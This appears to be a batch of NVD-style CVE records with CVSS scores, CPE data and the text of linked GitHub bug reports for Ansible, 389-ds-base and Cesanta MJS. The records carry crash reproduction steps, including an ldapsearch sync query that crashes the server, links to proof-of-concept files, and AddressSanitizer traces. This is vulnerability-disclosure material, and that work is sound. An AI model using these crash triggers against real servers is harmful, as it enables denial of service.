[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible_engine:*:*:*:*:*:*:*:*", "matchCriteriaId": "EDFA8005-6FBE-4032-A499-608B7FA34F56", "versionEndExcluding": "2.9.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "330" ]
330
https://github.com/ansible/ansible/issues/34144
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ansible", "ansible" ]
##### ISSUE TYPE - Bug Report ##### COMPONENT NAME lookups ##### ANSIBLE VERSION ``` 2.3.0.0, 2.4.1.0 ``` ##### CONFIGURATION no custom config ##### OS / ENVIRONMENT Linux ##### SUMMARY two consecutive facts from password lookup with same length get identical values. separate tasks or different length result in different values, as expected. ##### STEPS TO REPRODUCE ```yaml - name: Set random passwords for clusters set_fact: password1: "{{ lookup('password', '/dev/null length=20') }}" password2: "{{ lookup('password', '/dev/null length=20') }}" delegate_to: localhost delegate_facts: True - debug: msg: "{{hostvars['localhost'].password1}} {{hostvars['localhost'].password2}}" ``` ##### EXPECTED RESULTS two different values ##### ACTUAL RESULTS two identical values changing length for one of these, or using separate tasks, gives different values. http://docs.ansible.com/ansible/latest/playbooks_lookups.html#the-password-lookup says "A special case is using /dev/null as a path. The password lookup will generate a new random password each time", thus the current behaviour is at least confusing and unexpected. from irc : ```` <larsks> Richlv: Whatever is happening seems to be happening at a higher level than the password lookup plugin: as far as I can tell, it's only ever getting called once. ````
two random password lookups in same task return same value
https://api.github.com/repos/ansible/ansible/issues/34144/comments
19
2017-12-21T14:02:15Z
2020-03-18T14:27:39Z
https://github.com/ansible/ansible/issues/34144
283,891,152
34,144
2,003
CVE-2021-3514
2021-05-28T15:15:09.253
When using a sync_repl client in 389-ds-base, an authenticated attacker can cause a NULL pointer dereference using a specially crafted query, causing a crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/389ds/389-ds-base/issues/4711" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00026.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/389ds/389-ds-base/issues/4711" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00026.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:389_directory_server:-:*:*:*:*:*:*:*", "matchCriteriaId": "A861110D-0BBC-4052-BBFD-F718F6CD72C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/389ds/389-ds-base/issues/4711
[ "Third Party Advisory" ]
github.com
[ "389ds", "389-ds-base" ]
**Issue Description** When running a sync_repl client, it crashes current master <pre> ================================================================= ==2268384==ERROR: AddressSanitizer: SEGV on unknown address 0x000041b58abb (pc 0x7f2c75c6c68d bp 0x7f2be7fc3d60 sp 0x7f2be7fc3d40 T12) ==2268384==The signal is caused by a READ memory access. #0 0x7f2c75c6c68c in slapi_value_get_string ldap/servers/slapd/value.c:371 #1 0x7f2c71534436 in sync_create_state_control ldap/servers/plugins/sync/sync_util.c:194 #2 0x7f2c7153a89f in sync_srch_refresh_pre_entry ldap/servers/plugins/sync/sync_refresh.c:275 #3 0x7f2c75bb7365 in plugin_call_func ldap/servers/slapd/plugin.c:2002 #4 0x7f2c75bb6fb6 in plugin_call_list ldap/servers/slapd/plugin.c:1945 #5 0x7f2c75baf71c in plugin_call_plugins ldap/servers/slapd/plugin.c:414 #6 0x7f2c75bf9a6a in send_ldap_search_entry_ext ldap/servers/slapd/result.c:1488 #7 0x7f2c75bf75e6 in send_ldap_search_entry ldap/servers/slapd/result.c:1050 #8 0x7f2c75b82664 in send_entry ldap/servers/slapd/opshared.c:1140 #9 0x7f2c75b83687 in iterate ldap/servers/slapd/opshared.c:1326 #10 0x7f2c75b8493b in send_results_ext ldap/servers/slapd/opshared.c:1543 #11 0x7f2c75b7fffe in op_shared_search ldap/servers/slapd/opshared.c:882 #12 0x4700b1 in do_search ldap/servers/slapd/search.c:388 #13 0x4243c7 in connection_dispatch_operation ldap/servers/slapd/connection.c:659 #14 0x42a5f5 in connection_threadmain ldap/servers/slapd/connection.c:1777 #15 0x7f2c75549b33 (/lib64/libnspr4.so+0x2bb33) #16 0x7f2c754de4e1 in start_thread (/lib64/libpthread.so.0+0x94e1) #17 0x7f2c753966a2 in clone (/lib64/libc.so.6+0x1016a2) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ldap/servers/slapd/value.c:371 in slapi_value_get_string Thread T12 created by T0 here: #0 0x7f2c75de9955 in pthread_create (/lib64/libasan.so.5+0x3a955) #1 0x7f2c7554981a (/lib64/libnspr4.so+0x2b81a) </pre> **Package Version and Platform:** - Platform: fedora - **Steps to Reproduce** Steps to reproduce the behavior: 1. run sync_repl suite 2. start standalone 3. launch: ldapsearch ...-E sync=rp -b 'cn=config' 'objectclass=extensibleobject' **Expected results** Should not crash
SIGSEV with sync_repl
https://api.github.com/repos/389ds/389-ds-base/issues/4711/comments
10
2021-04-01T14:35:42Z
2022-08-16T17:27:10Z
https://github.com/389ds/389-ds-base/issues/4711
848,525,499
4,711
2,004
CVE-2020-18392
2021-05-28T21:15:08.260
Stack overflow vulnerability in parse_array Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/674.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/106" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/674.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/106" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:1.20.1:*:*:*:*:*:*:*", "matchCriteriaId": "22E31949-CED4-4383-B68C-5913872BA53A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "674" ]
674
https://github.com/cesanta/mjs/issues/106
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
POCs: https://github.com/ntu-sec/pocs/blob/master/mjs-8d847f2/crashes/so_mjs.c%3A14225_1.js https://github.com/ntu-sec/pocs/blob/master/mjs-8d847f2/crashes/so_mjs.c%3A14225_2.js ASAN output: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==31959==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd3bc1aef8 (pc 0x0000004d8a4c bp 0x7ffd3bc1b770 sp 0x7ffd3bc1af00 T0) #0 0x4d8a4b in __asan_memcpy (/home/hongxu/FOT/mjs-asan/mjs.out+0x4d8a4b) #1 0x544dc1 in mjs_mk_string /home/hongxu/FOT/mjs-asan/mjs.c:14225:9 #2 0x5436cb in mjs_get_own_property /home/hongxu/FOT/mjs-asan/mjs.c:12687:20 #3 0x545c5d in mjs_set_internal /home/hongxu/FOT/mjs-asan/mjs.c:12804:7 #4 0x534f61 in mjs_set /home/hongxu/FOT/mjs-asan/mjs.c:12772:10 #5 0x57bd68 in frozen_cb /home/hongxu/FOT/mjs-asan/mjs.c:12434:9 #6 0x54e48b in parse_array /home/hongxu/FOT/mjs-asan/mjs.c:6311:3 #7 0x54c4e1 in parse_value /home/hongxu/FOT/mjs-asan/mjs.c:6363:7 #8 0x54e858 in parse_array /home/hongxu/FOT/mjs-asan/mjs.c:6323:9 #9 0x54c4e1 in parse_value /home/hongxu/FOT/mjs-asan/mjs.c:6363:7 ... #228 0x54e858 in parse_array /home/hongxu/FOT/mjs-asan/mjs.c:6323:9 #229 0x54c4e1 in parse_value /home/hongxu/FOT/mjs-asan/mjs.c:6363:7 #230 0x54e858 in parse_array /home/hongxu/FOT/mjs-asan/mjs.c:6323:9 #231 0x54c4e1 in parse_value /home/hongxu/FOT/mjs-asan/mjs.c:6363:7 #232 0x54e858 in parse_array /home/hongxu/FOT/mjs-asan/mjs.c:6323:9 #233 0x54c4e1 in parse_value /home/hongxu/FOT/mjs-asan/mjs.c:6363:7 #234 0x54e858 in parse_array /home/hongxu/FOT/mjs-asan/mjs.c:6323:9 #235 0x54c4e1 in parse_value /home/hongxu/FOT/mjs-asan/mjs.c:6363:7 #236 0x54e858 in parse_array /home/hongxu/FOT/mjs-asan/mjs.c:6323:9 #237 0x54c4e1 in parse_value /home/hongxu/FOT/mjs-asan/mjs.c:6363:7 #238 0x54e858 in parse_array /home/hongxu/FOT/mjs-asan/mjs.c:6323:9 #239 0x54c4e1 in parse_value /home/hongxu/FOT/mjs-asan/mjs.c:6363:7 #240 0x54e858 in parse_array /home/hongxu/FOT/mjs-asan/mjs.c:6323:9 #241 0x54c4e1 in parse_value /home/hongxu/FOT/mjs-asan/mjs.c:6363:7 #242 0x54e858 in parse_array /home/hongxu/FOT/mjs-asan/mjs.c:6323:9 #243 0x54c4e1 in parse_value /home/hongxu/FOT/mjs-asan/mjs.c:6363:7 #244 0x54e858 in parse_array /home/hongxu/FOT/mjs-asan/mjs.c:6323:9 #245 0x54c4e1 in parse_value /home/hongxu/FOT/mjs-asan/mjs.c:6363:7 #246 0x54e858 in parse_array /home/hongxu/FOT/mjs-asan/mjs.c:6323:9 #247 0x54c4e1 in parse_value /home/hongxu/FOT/mjs-asan/mjs.c:6363:7 #248 0x54e858 in parse_array /home/hongxu/FOT/mjs-asan/mjs.c:6323:9 #249 0x54c4e1 in parse_value /home/hongxu/FOT/mjs-asan/mjs.c:6363:7 SUMMARY: AddressSanitizer: stack-overflow (/home/hongxu/FOT/mjs-asan/mjs.out+0x4d8a4b) in __asan_memcpy ==31959==ABORTING ```
AddressSanitizer: stack-overflow at mjs.c:14225
https://api.github.com/repos/cesanta/mjs/issues/106/comments
2
2018-07-03T06:21:09Z
2021-06-01T18:04:03Z
https://github.com/cesanta/mjs/issues/106
337,760,000
106
2,005
CVE-2020-36367
2021-05-28T21:15:08.370
Stack overflow vulnerability in parse_block Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/135" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/135" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:1.20.1:*:*:*:*:*:*:*", "matchCriteriaId": "22E31949-CED4-4383-B68C-5913872BA53A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "674" ]
674
https://github.com/cesanta/mjs/issues/135
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
An issue was discovered in mjs.c 1.20.1. Stack Exhaustion occurs in mjs_mk_string function, and there is a stack consumption problem caused by recursive stack frames POC: [POC.zip](https://github.com/cesanta/mjs/files/3226071/POC.zip) ASAN output: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==22443==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc66adaa38 (pc 0x0000004dd9cf bp 0x7ffc66adb2b0 sp 0x7ffc66adaa40 T0) #0 0x4dd9ce in __asan_memmove /home/hjwang/Tools/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:31 #1 0x517ab8 in mbuf_insert /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:4790:5 #2 0x5945c2 in emit_byte /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:7672:3 #3 0x5945c2 in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12203 #4 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #5 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #6 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #7 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #8 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #9 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #10 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #11 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #12 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #13 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #14 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #15 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #16 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #17 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #18 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #19 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #20 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #21 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #22 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #23 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #24 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #25 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #26 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #27 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #28 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #29 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #30 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #31 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #32 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #33 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #34 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #35 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #36 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #37 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #38 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #39 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #40 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #41 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #42 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #43 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #44 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #45 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #46 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #47 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #48 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #49 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #50 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #51 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #52 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #53 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #54 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #55 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #56 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #57 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #58 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #59 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #60 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #61 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #62 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #63 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #64 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #65 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #66 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #67 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #68 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #69 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #70 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #71 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #72 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #73 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #74 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #75 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #76 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #77 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #78 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #79 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #80 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #81 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #82 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #83 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #84 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #85 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #86 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #87 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #88 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #89 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #90 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #91 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #92 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #93 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #94 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #95 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #96 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #97 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #98 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #99 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #100 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #101 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #102 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #103 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #104 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #105 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #106 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #107 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #108 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #109 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #110 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #111 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #112 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #113 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #114 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #115 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #116 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #117 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #118 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #119 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #120 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #121 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #122 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #123 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #124 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #125 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #126 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #127 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #128 0x57f914 in parse_statement_list 